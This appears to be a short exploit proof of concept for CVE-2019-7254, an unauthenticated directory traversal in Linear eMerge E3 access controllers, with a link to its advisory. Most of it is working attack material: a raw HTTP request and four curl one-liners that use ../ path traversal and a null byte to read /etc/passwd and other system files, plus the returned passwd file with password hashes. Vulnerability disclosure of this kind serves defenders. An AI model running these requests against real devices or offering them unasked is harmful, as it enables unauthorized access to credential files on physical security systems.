Share
Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure  
Affected version: <=1.00-06  
CVE: CVE-2019-7254  
Advisory: https://applied-risk.com/resources/ar-2019-005  
  
by Gjoko 'LiquidWorm' Krstic  
  
  
GET /?c=../../../../../../etc/passwd%00  
Host: 192.168.1.2  
  
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh  
bin:x:1:1:bin:/bin:  
daemon:x:2:2:daemon:/sbin:  
adm:x:3:4:adm:/var/adm:  
lp:x:4:7:lp:/var/spool/lpd:  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:  
news:x:9:13:news:/var/spool/news:  
uucp:x:10:14:uucp:/var/spool/uucp:  
operator:x:11:0:operator:/root:  
games:x:12:100:games:/usr/games:  
gopher:x:13:30:gopher:/usr/lib/gopher-data:  
ftp:x:14:50:FTP User:/home/ftp:  
nobody:x:99:99:Nobody:/home/default:  
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh  
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh  
  
  
curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd  
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version  
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue  
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00